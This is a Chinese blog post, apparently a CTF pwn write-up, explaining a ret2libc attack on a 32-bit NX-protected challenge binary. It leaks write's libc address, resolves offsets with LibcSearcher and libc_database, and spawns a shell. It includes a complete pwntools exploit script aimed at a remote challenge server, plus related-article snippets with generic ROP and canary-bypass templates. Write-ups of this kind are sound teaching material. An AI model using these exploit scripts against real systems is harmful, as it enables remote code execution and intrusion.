CTF中的PWN——绕NX防护2(泄露libc + 栈溢出)

最新推荐文章于 2025-06-14 19:52:48 发布
最新推荐文章于 2025-06-14 19:52:48 发布
阅读量1.9k 收藏 5
点赞数 1
CC 4.0 BY-SA版权
分类专栏: PWN
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_39194641/article/details/102698265
本文深入探讨了在PWN攻击中如何绕过NX保护机制,利用write函数泄露远程libc地址,通过LibcSearcher与libc_database工具定位函数偏移,最终实现系统函数的调用。文章提供了详细的步骤与代码示例。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

前言:

    继续PWN的学习,今天整理一下绕过NX,同时libc本地不存在需要通过相应函数泄露地址的方式进行进行溢出。

本题工具介绍:

  • LibcSearcher 

    一个基于libc_database写的python库,可以通过泄露的函数实际地址查找对应的libc版本。

from LibcSearcher import *

#第二个参数,为已泄露的实际地址,或最后12位(比如:d90),int类型
obj = LibcSearcher("fgets", 0X7ff39014bd90)

obj.dump("system")        #system 偏移
obj.dump("str_bin_sh")    #/bin/sh 偏移
obj.dump("__libc_start_main_ret")

    本题 通过write函数实际地址找到远程的libc,然后dump出其他函数的offset。

  • libc_database

    ./add 用来添加libc库

./add /usr/lib/libc-2.21.so

    ./find 用来查找libc版本

$ ./find printf 260
archive-glibc (id libc6_2.19-10ubuntu2_i386)

    ./dump 用来输出libc中的一些函数的偏移

$ ./dump libc6_2.19-0ubuntu6.6_i386
offset___libc_start_main_ret = 0x19a83
offset_system = 0x00040190
offset_dup2 = 0x000db590
offset_recv = 0x000ed2d0
offset_str_bin_sh = 0x160a24

    本题找到远程加载的libc版本后使用此工具dump出其他函数的offset。

题目:(new bugku pwn7)

    检查程序详细信息,发现为32bit,开启着NX,同时 RELRO:    Partial RELRO。

    放入IDA中静态分析,发现read()危险函数,主函数有write函数:

    此题目思路:使用wirte函数泄露出(wirte/__libc_start_main)等实际地址,查找对应的libc动态链接库,通过此库查找系统函数的偏移,计算相应的实际地址,溢出即可。构造payload如下:

from pwn import *

context.log_level = "debug"

#p = process('./pwn7')
p = remote('114.116.54.89',10007)
elf = ELF('./pwn7')

write_plt = elf.plt['write']
write_got = elf.got['write']
print write_got
libc_start_main_got = elf.got['__libc_start_main']
main_addr = 0x0804846B
offset_write = 0x000d43c0
offset_system = 0x0003a940
offset_str_bin_sh = 0x15902b

payload = 'A' * 40 + p32(write_plt) + p32(main_addr) + p32(1) + p32(write_got) + p32(4)

p.sendlineafter('plz input your name:\n',payload)
write_addr = u32(p.recv(4))
libc_base = write_addr - offset_write
sys_addr = libc_base + offset_system
sh_addr = libc_base + offset_str_bin_sh

payload = 'A' * 40 + p32(sys_addr) + 'nEIP' + p32(sh_addr)
p.sendline(payload)
p.interactive()

    脚本运行结果如下:

 

    注:常用的32bit带参溢出的方式中会使用4byte代替PUSH EIP来骗过CPU,但是此软件要通过溢出泄露出write函数的实际地址后继续溢出,那么就需要将返回地址填充想要继续执行的指令的地址;

           针对本地的调用wirte@plt函数,在构造参数的时候是p32(1) + p32(write_got) +p32(4)作为write函数的参数,其中“1”表示的是标准输出,而0代表标准输入。“4”代表4字节。

总结:

  • 关于绕过NX的方式:
  1. 软件有system函数的直接用;
  2. 程序自带libc,直接elf.symbols['system']  elf.search(''/bin/sh)或使用one_gadgat构造ROP链;
  3. 需要泄露远端libc版本,一般使用puts/write泄露地址,计算基地址。
CTFshow-PWN-栈溢出pwn50)
Welcome To Myon'Blog !
06-10 189
摘要:本文描述了一个64位程序的ROP攻击过程。通过gets函数溢出,利用ret2libc技术,先使用puts函数泄露真实地址,找到gadgets(pop rdi;ret和ret指令)。攻击分两步:首先构造payload泄露puts函数地址,计算libc基址;然后组合system和/bin_sh地址实施攻击,最终成功获取flag(ctfshow{11ba423c-006e-429f-9ebd-9fb219f3611f})。整个过程涉及动态链接库地址计算和ROP链构造技术。
CTFshow-PWN-栈溢出pwn47)
Welcome To Myon'Blog !
06-09 319
摘要:这是一篇关于32位小端序系统漏洞利用的技术分析文章。作者通过分析存在NX保护的二进制文件,利用gets函数的溢出漏洞和提供的/bin/sh偏移地址,构建了ret2libc攻击。文章详细介绍了如何通过泄露puts函数地址来定位libc基址,最终获取system函数地址完成攻击。攻击脚本使用pwntools工具包实现,重点解决了libc版本选择问题(最终选用libc6-i386_2.27-3ubuntu1_amd64),成功获取了flag。该技术适用于32位栈传参架构,展现了典型的ROP攻击方法。
ret2libc3地址泄露--pwn
weixin_44642009的博客
03-17 2897
练习三–ret2libc3地址泄露 在此实验前,我们从简到难实验了ret2libc1,ret2libc2两个实验,对getshell有了一定了解,基本学会了如何在有无system及/bin/sh函数的情况下获取权限,在此以实验二的名为pwn的可执行文件为入手点,进行getshell。 首先,对ret2libc3可执行文件进行检测, checksec ret2libc3 结果如图: 发现其不存...
CTF中的PWN——NX防护1(本地libc 栈溢出
壊壊的诱惑你的博客
09-29 5110
进阶到防护篇了,首先学一下NX防护的基础题目。 NX防护 NX是数据与程序的分水岭,栈溢出核心思想是通过局部变量覆盖函数返回地址来修改EIP和注入 Shellcode,在函数返回时跳到Shellcode去执行。要防止这种攻击,最有效的办法就是让攻击者注入的Shellcode无法执行,这就是数据执行保护(Data Execution Prevention, DEP)安全机制的初衷...
【浅析栈溢出漏洞原理——简单例题讲解】
最新发布
2301_80315809的博客
06-14 996
栈溢出漏洞攻击原理与示例演示 栈溢出漏洞通过向栈缓冲区写入超长数据覆盖函数返回地址(eip),从而控制程序执行流程。本文以32位Linux程序为例,演示攻击过程:1)编译时禁用保护机制;2)确定目标函数地址(0x8049196);3)使用模式字符串定位返回地址偏移(24字节);4)构造payload填充地址(注意小端序和编码问题)。关键点在于:终端可能对不可打印字符进行编码转换,需使用二进制写入;空字节会导致输入截断。最终成功跳转至attack函数输出"Attacked!",验证了漏洞利
[pwn]ROP:NX策略
Breeze的博客
05-03 1万+
ROP学习实例:NX策略 我们使用的例子是这篇博客中的第一个例子:https://bbs.ichunqiu.com/thread-42530-1-1.html?from=sec,在i386环境中运行,很简单的一道题,这里提供一种更加简单的解法,只需细致观察,可以免除一些不必要的计算。 NX策略是使栈区域的代码无法执行,但我们可以使用ROP过。 ROP技术就是不需要自己手动写shellcode...
泄露libc
inquisiter
01-12 1643
pintf泄露libc 虽然存在格式化字符串漏洞,并且GOT表可写,但是程序使用的是printf_chk函数。会检测出形如"%n"和"%12$p"这种利用方式。 考虑到main函数由libc_start_main调用,因此栈上的返回地址是一个libc中的地址,利用格式化字符串漏洞能泄露libc的基址。 “%p::%p::%p::%p::%p::%p::%p::%p”。第8个%p就能打印出l
泄漏libc基地址
yjh_fnu_ltn的博客
06-01 1751
这里可以利用vulnerable_function函数进行栈溢出,利用write函数泄漏write函数的地址,从而拿到libc,使用write函数泄漏write函数地址时(puts函数同理),即使程序在前面。利用write函数的got表和plt表,溢出得到write函数的地址,在计算得到libc_base基地址。先看汇编下调用write函数时参数的传递:(以32位为例),泄漏 fun_name的got地址和。
[CTF]PWN--沙盒中的栈迁移构造read利用
2301_79880752的博客
02-26 1331
我们需要在调试中寻找read函数的返回地址,将其作为读入的位置,因为我们后面要在这个构造的read函数中读入orw,我们将orw写入到read函数返回地址上,这样读入之后就可以直接执行orw获取权限,为了使程序运行成功我们可以先随便写一个bss地址作为读入位置。还记得我们一开始将读入位置迁到bss段上了吗,连接远程时程序运行时的生成栈地址可能会改变,但是,内存(bss)是不会变的,因此本题我们可以直接通过调试得到返回地址,而这个返回地址必然是bss段地址,也就是说在连接远程的时候是不会改变的。
CTFshow-PWN入门-栈溢出pwn35~pwn40
weixin_63576152的博客
08-22 1630
本文主要详解CTFshow中pwn入门系列的栈溢出模块的前6题所用工具:linux环境下的虚拟机、IDA Pro、exeinfope参考文章:以下操作中小编用的都是自己的kali环境。
[pwn]ROP:信息泄露获取libc版本和地址
热门推荐
Breeze的博客
08-26 1万+
文章目录通过信息泄露获取libc版本和地址DynELF模块介绍pwn200 writeuppwn100 writeup 通过信息泄露获取libc版本和地址 有一些pwn题目中我们可以找到很明显的溢出,但程序中并没有system函数,也没有给出libc版本。但我们可以通过反复的溢出打印一些内存的值来在内存中搜索system的地址,这里主要使用的工具是pwntools中的D以内ELF模块。 DynEL...
pwn】orw&rop --泄露libc基址,orw
question55的博客
12-04 471
我们先看看程序的保护的情况因为题目提示了orw,我们可以沙箱检测一下可以发现是禁用的execve函数的,接着看函数逻辑这里格式化字符串漏洞可以泄露canary和puts函数地址,先确定一下参数位置可以发现参数是在第六个位置,接下来就是构造ROP,调用read函数读取shellcode到mmap开辟的地址就行,这里的gadget可以用题目给的libc.so.6进行寻找,exp如下:from pwn import *context(os='linux',arch='amd64',log_level='debug
[PWN] 泄露libc HarekazeCTF_2019_baby_rop2
LDX的博客
11-28 783
pwn 64位 泄露libc版本
ret2libc-泄露和不需要泄露
qq_36918532的博客
04-18 316
ciscn_2019_c_1 —需要泄露got 题目可在buuctf下载 安全检查,发现只开了NX保护(DEP) 执行程序会发现,程序第二次原模原样输出了((这种菜单题,我还以为是堆)) IDA查看反汇编代码 加密函数 其中x在bss段定义,一直在增加,所以会导致上面的第二次执行的时候长度>s,从而不执行加密那块,这可以用来泄露地址 也就是后面会变的只有比上一次输入长的部分 操作如下图 由于get可以一直输入,达到一定长度报段错误,这应该是说明覆盖到返回地址了,所以猜想应该是只要覆盖了返回地
ROP NX 技术--pwntools--shellcode 资料 入门基础
qq_43613772的博客
07-25 1033
最近做pwn频繁地遇到开启了 NX 保护的二进制程序,NX 保护最常用的方法就是 ROP。网络上关于 ROP 的原理和 CTF 这类题目的文章较多,但是这些文章要不就是给出了一堆代码,要不只是单纯地讲解 CTF 题目和 ROP 原理(写的还不详细),也缺乏系统性地讲解这类 CTF 题目的解题步骤,这通常会阻碍初学者的学习步伐和热情。 函数调用约定 函数的调用约定就是描述参数是怎么传递和由谁平...
构建栈帧NX选项
ChuMeng1999的博客
01-11 554
目录预备知识一、栈帧二、NX选项三、扩展阅读实验目的实验环境实验步骤一通过GCC编译选项控制NX的开启和关闭实验步骤二溢出点分析实验步骤三编写漏洞利用代码 预备知识 本实验要求实验者具备如下的相关知识。 一、栈帧 在高级语言中,当函数被调用时,系统栈会为这个函数开辟一个栈帧,并把它压入到栈里面。新开辟的栈帧中的空间被它所属的函数所独占,当函数返回的时候,系统栈会清理该函数所对应的栈帧以回收栈上的内存空间。 每个函数都拥有自己独占的栈帧空间,有两个特殊的寄存器用于标识栈帧的相关参数: 1.ESP寄存器,永远指
什么是gadget,以及64位libc如何泄露的问题
qq_43557177的博客
04-06 4032
最近开始学PWN,本以为栈溢出也就那些东西,看来是我少虑了… 在这里对这几天所学习的64位栈溢出泄露Libc的相关知识做一个小总结,当然,如果可以帮助到在读文章的你就更好啦。如果文中有错误,也希望各位大佬予以斧正。 什么是LIbc? 这个就是libc 这是一个动态链接文件 那么什么是动态链接和静态链接? 可以理解为: 静态链接:在程序编译的过程中,就预先把代码加载进程序中 //比如大家都经常写的...
PWN入门(7)NX enabled与返回LibC
Ba1_Ma0的博客
09-23 1768
简介“pwn"这个词的源起以及它被广泛地普遍使用的原因,源自于魔兽争霸某段讯息上设计师打字时拼错而造成的,原先的字词应该是"own"这个字,因为 ‘p’ 与 ‘o’ 在标准英文键盘上的位置是相邻的,PWN 也是一个黑客语法的俚语词,是指攻破设备或者系统。发音类似"砰”,对黑客而言,这就是成功实施黑客攻击的声音,而在ctf比赛里,pwn是对二进制漏洞的利用下载这个github库,进入06文件夹,32位程序文件夹。
BUUCTF(pwn) jarvisoj_level4 栈溢出,泄露libc
半岛铁盒的博客
08-18 446
思路 我们没有system和’/bin/sh’地址。也不知道libc版本, 我们可以先leek出来一个地址, 利用偏移找到system和’/bin/sh’地址。再返回main进行循环调用,第二次就可以直接控制返回到system。 from pwn import * from LibcSearcher import * p=remote('node4.buuoj.cn',26441) elf=ELF('./level4') write_plt=elf.plt['write'] read_got=elf.g..
ctf pwn栈溢出题目
01-25
### CTF PWN 栈溢出题目解题思路与漏洞利用教程 #### 一、栈溢出基础概念 栈溢出是一种常见的内存错误,当程序试图向栈中写入的数据量超过了分配给该变量的空间时就会发生。这种情况下,额外的数据会覆盖相邻的内存区域,可能导致程序行为异常甚至崩溃。在CTF竞赛中的PWN挑战里,攻击者可以巧妙地利用这一特性来改变程序执行流程,达到任意代码执行的目的。 #### 二、常见技术手段及其应用场景 ##### (一)Return-to-libc (ret2libc) 这种方法适用于目标系统启用了NX位保护的情况,在此条件下直接注入Shellcode变得不可行。通过精心构造输入数据,使得函数返回后跳转至`libc`库内的某个有用功能(如`system()`),并传递合适的参数指向环境变量或其他位置存储的命令字符串(通常是`/bin/sh`)。这种方式不需要实际执行自定义机器码就能完成提权操作[^3]。 ```python from pwn import * # 建立连接 conn = remote('target_ip', port) # 构造payload offset_to_return_address = b'A' * offset_length address_of_system_function = pack(system_addr, 'little') argument_for_system_call = pack(bin_sh_string_addr, 'little') final_payload = offset_to_return_address + address_of_system_function + argument_for_system_call # 发送载荷触发漏洞 conn.send(final_payload) # 进入交互模式等待进一步指令 conn.interactive() ``` ##### (二)Return-Oriented Programming (ROP) 对于开启了ASLR(Address Space Layout Randomization)机制的目标而言,单纯依靠固定的地址难以稳定工作。此时可采用ROP链的方式过这些限制。具体做法是从现有二进制文件或共享库中挑选一系列短小精悍的小工具(gadgets),它们各自负责一小部分任务;然后按照一定顺序串联起来形成完整的恶意逻辑序列。最终目的是调用能够创建新进程或者打开shell等功能的方法[^1]。 ```python rop_chain = ROP(binary_path_or_elf_object) # 添加gadget到rop chain中... rop_chain.raw(pack(pop_rdi_gadget)) rop_chain.raw(pack(command_arg)) rop_chain.call(target_function_name) exploit_code = cyclic(offset_before_retaddr) + str(rop_chain) ``` ##### (三)Bypassing Canary Protection 现代操作系统为了防止缓冲区越界读取引发的安全隐患引入了canaries随机数作为屏障放置于局部数组之后但在保存下来的基址指针之前的位置上。一旦检测到canary值被篡改,则立即终止应用程序以防事态扩大。然而如果能事先获知其确切数值的话还是有机会突破防线继续实施后续动作。可以通过格式化串漏洞或者其他途径间接获取canary的具体值。 ```python leaked_canary_value = u64(leak_response[-8:].ljust(8,b'\x00')) forgery_input = flat({ padding_len: leaked_canary_value, return_addr_offset: target_func_ptr }) ``` #### 三、实战案例分析 以一道典型的CTF PWN题目为例说明整个过程: 假设有一个存在栈溢出缺陷的服务端应用正在监听网络请求,它接受客户端发送过来的一条消息并将其打印出来。经过初步逆向工程得知其中确实隐藏着一处危险点允许外部操控EIP寄存器的内容。考虑到服务器部署环境中已经禁用了execve syscall以及所有形式的动态加载模块访问权限,因此决定采取基于静态链接版本下的return-oriented programming策略来进行破解尝试。 首先定位到了几个关键性的辅助函数入口地址,包括但不限于`read()`, `write()`, 和最重要的`dup2()`用于重定向标准I/O描述符以便后期建立反向外连通道。接着便是着手准备必要的Rop Chain组件,这里涉及到多次试探性查询直至完全掌握堆栈布局细节为止。最后一步就是组合成完整有效的Payload并通过socket接口投递给远端主机上的易受攻击服务实例上去验证效果如何。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值